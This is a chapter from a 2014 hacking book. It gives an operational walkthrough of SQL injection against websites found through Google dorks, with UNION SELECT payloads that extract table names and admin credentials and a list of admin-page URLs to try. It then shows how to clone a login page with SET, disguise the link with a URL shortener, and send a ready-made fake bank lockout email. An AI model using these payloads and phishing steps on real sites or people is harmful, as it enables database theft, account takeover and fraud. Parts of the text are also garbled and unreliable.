Website Hacking - A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

Chapter 6. Website Hacking

We will cover:

History of SQL injection

Understanding SQL injection

Simple SQL-injection

Introduction to Phishing

Performing Phishing

Sometimes you may want to hack your own website you made to see how it goes. Or maybe a friend or a client asked you to test his website to see if it’s vulnerable and website hacking might come in handy.

History of SQL injection

The language SEQUEL was developed by the IBM corporation. Relational Software which now is known as Oracle has introduced in 1979 the great implementation of SQL. After many test, it was available to start using through 1979 and 1983.

From that language people started implementing malicious codes and one of them was SQL injection to attack websites and applications. In 2007 SQL was considered to be one of the top 10 vulnerabilities of 2007 and 2010 and in 2013 was number one attack methods.

Understanding SQL-injection

SQL injection is used to gain entries from the available public entry to the database. SQL injection commands are filled in the form instead of the normal account login. Once the SQL commands are in the database it can also pinpoint the other databases in the same server. Suitable sites to hack with SQL injection are forms of contact, feedback fields, shopping cards and many more. Most of the fields allow for SQL commands.

Necessary things

The necessary things that a business needs to be hacked is based on two factors: size of the business, age, update status, patches of the applications and the number of staff. It depends on what you are about to attack and your tools are well designed.

Types of SQL injection attacks

* Authentication Bypass

* Information Disclosure

* Compromised Data Integrity

* Compromised Availability of Data

* Remote Command Execution

Simple SQL-injection

SQL injection can be used in forms of contact, feedback fields, shopping cards and many more. Most of the fields allow for SQL commands. But nowadays it’s really difficult to do an SQL injection in some site because most of them come really tight protected from SQL-injection.

Doing a SQL-injection

1. First off go to Google.com. There you will search for vulnerable sites. To find them type one of these keywords

inurl:pageid=

inurl:index.php?id=

inurl:/login.php

2. Once you searched one of those keywords in google you will find a list of vulnerable sites. Your task will be to visit these sites one by one to check their vulnerability.

3. When your inside add a single quotes at the end of the site url and hit Enter. For example:

http://www.testing_site.com/index.php?id=2'

If the page remained on the same page or showed “page not found”, it means a not vulnerable site.

And if you got an error message like this one it means that site is vulnerable.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line

4. Awesome you found a website that is vulnerable. Now we will need to find the number of columns present in the target database. For that replace the single quotes(‘) with “order by 1” or “order by 2” or “order by 3” “order by 4,5,6,7… statement.

For example:

http://www.testing_site.com/index.php?id=2 order by 1

http://www.testing_site.com/index.php?id=2 order by 2

http://www.testing_site.com/index.php?id=2 order by 3

http://www.testing_site.com/index.php?id=2 order by 4

Keep trying each time until you get the error like “unknown column”.

In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.

http://www.testing_site.com/index.php?id=2 order by 1--

http://www.testing_site.com/index.php?id=2 order by 2--

http://www.testing_site.com/index.php?id=2 order by 3--

http://www.testing_site.com/index.php?id=2 order by 4--

http://www.testing_site.com/index.php?id=2 order by 5--

5. Finding the vulnerable columns

Now let’s find the vulnerable column by trying the query "union select columns_sequence".

6. Now change the id value to negative(id=-2). It’s time to replace the columns sequence from 1 to x-1 separated with commas(,)

http://www.testing_site.com/index.php?id=-2 union select 1,2,3,4,5,6,7—

When this code is executed. You will retrace the vulnerable column. There you have it.. column 3 and 7 are vulnerable. Let’s take the vulnerable colmn 3 first.

7. Replace the column 3 from the query with “version”.

For example

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7—

This should display the version at 5.0.1 or 4.3

8. Change the version() with database() and user() to find the database user respectively.

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7—

If nothing happens or It went wrong try this one:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7—

9. We are almost done . All that we have to do now is to find the table name.

To do that we will have to replace the 3 with “group_concat(the table name) and included with the from information_schema.tables where table_schema=database ()—

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()—

10. Now with this it will show you a list of table of names. It’s up to you to find the table name witch is related with the user or admin.

11. Now you need to replace the group_concat(table_name) with the “group_concat(column_name)”

12. Also replace “from information_schema.tables table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

And we have to change the table name to MySwl CHAR() string.

13. It would be great if you could install the HackBar addon right now(see Figure 6-1)

In Figure 6-1 .Here I’m showing how it will look like when you’re about to download to script.

Once its installed there will be this toolbar. Press on F9 to show/hide it(see Figure 6-2)

In Figure 6-2 .Here the hackbar is in action ready to start hacking

14. We go to sql->Mysql->MysqlChar() inside the hackbar.

This will demanding the string that we want to change to MySQLCHAR(). Now what we have to do is type the code at the end of the url instead of the "mysqlchar"

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—

15. Now you are supposed to see the list of column.

For example:

example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

16. And next, replace the the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

17. Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For example:

http://www.testing_site.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin—

18. It’s supposed to show the data stored in the database. Depends on the column name .If all of these query gives an error message then try some other columns name from the list.

19. Now it’s time to try with one of these url link for finding the url link.

http://www.testing_site.com/admin.php
http://www.testing_site.com/admin/
http://www.testing_site.com/admin.html
http://www.testing_site.com:2082/

After then with few tries with failures, you will wind up inside the administrator page using these urls examples.

Introduction to Phishing

Phishing is a method for hacking into people account by sending them an email that really looks legitimate with the purpose to retrieve the person financial information from the recipients. Most of the time the messages might look to come from a trustworthy website. This email might look like they are coming from an online banking site, social network site or an online shopping site.

One of the most common ways to fool a victim is by lying in the message that the victim has fraudulent activity on the account. And, in the bottom you might put “click here” to verify your information.

Whaling

This type of phishing is specifically directed to many high ranking person inside the business or the organization.

Spear phishing

This one is focused on any people who have some connection with the organization

Performing Phishing

Here I’m about to show you how you can hack any social network account or an email account or even a bank account by using the phishing method to retrieve the user account information.

Phishing actually consist of these process witch I call Manual Phishing:

1. Copy the login page

2. Search for the code line inside source code

3. Make some changes inside the code

4. Create a free hosting account , Most of the times your account gets suspended cause it’s against the rules to have a phishing site online

5. Upload the fake Login Page you created on the hosting site.

6. Send a fake email to your victim

7. Then at last but not least retrieve the information the victim entered.

But this can actually consume time and some work, which is by saving the” index.html” file to the computer and then upload it into a website server and it doesn’t always work. So, I found a way that is much more exciting and easy in backtrack (Not installed in virtual machines, but either booted from a live CD or fully installed on your hard disk or else it won't work) I call it Automated Phishing:

1. First run Backtrack to the desktop and run the terminal.

2. To read your ip address Type:

ifconfig

3. Next lets go in the pentest by typing:

cd /pentest/exploits/set

4. Now that we are in the folder type in

./set

(Y to agree the terms)

5. Select 1 for Social-Engineering Attacks

6. Now we choose 2 to select the Website Attack Vectors.

7. We now select 4 for “Tabnabbing Attack Method.

8. We now select 2 for Site Cloner.

9. Enter your ip the machine your using that you saw earlier .

10. In this step you will have to enter the name of the site you want to make a phishing page. It could be again ANY social network site or email site for example: http://www.ffthesocialnetwork_or_emailsite.com/

11. After a few moment of waiting it asks to press Return, So do it afterwards press “Enter” (see Figure 6-3)

In Figure 6-3 .It will look like this when its ready to initiate.

12. Now what actually happened is that your ip address has turned into your phishing page link.

13. The next step is make your IP shorter to do so we go to http://goo.gl/ and paste our link and click on Shorten Url. (see Figure 6-4)

In Figure 6-4 .This is the google url shrinker in action.

14. And there you have it test the link if it works. Now you need to either email the link or message the link to a friend that can handle this prank or yourself for educational purposes.

15. Now when the ID and the Password is entered you’ll receive the email and password in your terminal. (So leave the terminal open and don’t restart the PC until it’s in otherwise the ip might change).

Writing the Email

Now your website is ready, the only thing that is missing is to write your fake email with your link inside it. Take a moment to analyze this fake letter.

Dear Customer

We regret to inform you that we had to lock your account access because we have reasons to believe that it may have been compromised by outside parties.

In order to protect your sensitive information, we temporarily suspended your account access.

Click here to verify and reactivate your account access by completing the secure form that will appear.This security measure that will ensure that you are the only person with access to the account . Thank you for your time and consideration in this matter.

Please do not reply to this message

For any inquiries, contact Customer Service.

As you can see here the guy who wrote this did a bit of research on the victim life or personal information before writing this phishing mail. And that’s exactly what phishing is all about. Don’t try this at home.

Small summary ahead

* SQL injection is used to gain entries from the available public entry to the database.

* SQL injection are forms of contact, feedback fields, shopping cards and many more. Most of the fields allow for SQL commands.

* Phishing is a method for hacking into people account by sending them an email that really looks legitimate with the purpose to retrieve the person financial information from the recipients.

* There are two types of phishing Whaling and Spear Phishing